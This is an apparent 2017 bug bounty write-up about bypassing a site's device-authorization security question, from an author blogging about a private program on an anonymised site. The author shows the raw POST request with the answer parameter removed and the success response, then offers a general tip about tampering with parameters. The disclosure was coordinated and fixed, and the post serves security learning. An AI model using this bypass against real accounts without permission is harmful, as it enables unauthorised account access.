Device Authorization Bypass!

HassanKhanYusufzai
Sep 25, 2017 · 3 min read

Hello everyone this is Hassan Khan Yusufzai & i would like to share one of my finding. So its about 2 months ago when i got private invite on BugCrowd. For the sake of private programs privacy lets say it “Private.com”.

So, When i was pen-testing that application i first noticed their functionality. The functionality which caught my attention was like When we login from the trusted device we are not prompt for secret security question but if we login from the un-trusted device or we can say from new device we are redirected to Private.com/device-authorization. So, i looked for common ways to bypass this like with rate limit etc but unfortunately there was a rate limit protection. I tested the application whole day but i can’t find any way to bypass device authentication. Actually i made promise to my self that i will bypass that ;) but it was no getting bypass so it just made me fed up :/. I just left that target and started hunting some other sites.

After 2 days i though lets give that private.com another shot. So, i checked the POST request & suddenly i thought why not try to remove the parameter and its value?. The POST request was like.

Request:

POST /device-authorization HTTP/1.1
Host: private.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json;charset=utf-8
X-Requested-With: XMLHttpRequest
Referer:
https://www.private.com/device-authorization
Content-Length: 57
Cookie: SNIP
Connection: close

{“deviceAuth[remember]”:true,”deviceAuth[answer]”:”test”}

What i did next was i just removed ”deviceAuth[answer]”:”test” from the POST data & sent the POST request with only {“deviceAuth[remember]”:true}

What i get in response was some thing like that

Response:

HTTP/1.1 200 OK
Date: Mon, 25 Sep 2017 20:52:59 GMT
Content-Type: application/json
Content-Length: 47
Connection: close
Cache-Control: no-cache
X-Frame-Options: SAMEORIGIN
Set-Cookie:
Set-Cookie:
X-NewRelic-App-Data:
Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
X-Content-Type-Options: nosniff

{“Success”:true}

And i was redirected to the /settings of my profile :D You know whats next ? Bounty :P So just by removing the parameter and its value i was able to bypass device authorization.

Issue was fixed within a day & Analyst stated that:

Nice find!

Thank you for reporting this vulnerability to us and provide with very detailed report.
We have applied a fix, can you help verify if the issue has been resolved, so we can move the ticket to closed. Thank you very much!

Tip:

Don’t forget to append & removed parameters to bypass stuff.

I hope you guys learned something new :)

Thanks for reading,

Regards,

Hassan Khan Yusufzai

InfoSec Write-ups

A collection of write-ups from the best hackers in the…

HassanKhanYusufzai

Written by

Web Penetration Tester & Security Analyst Acknowledged by Top companies including Google,Microsoft ,Twitter, Ebay, Sony and Many others.

InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew

HassanKhanYusufzai

Written by

Web Penetration Tester & Security Analyst Acknowledged by Top companies including Google,Microsoft ,Twitter, Ebay, Sony and Many others.

InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store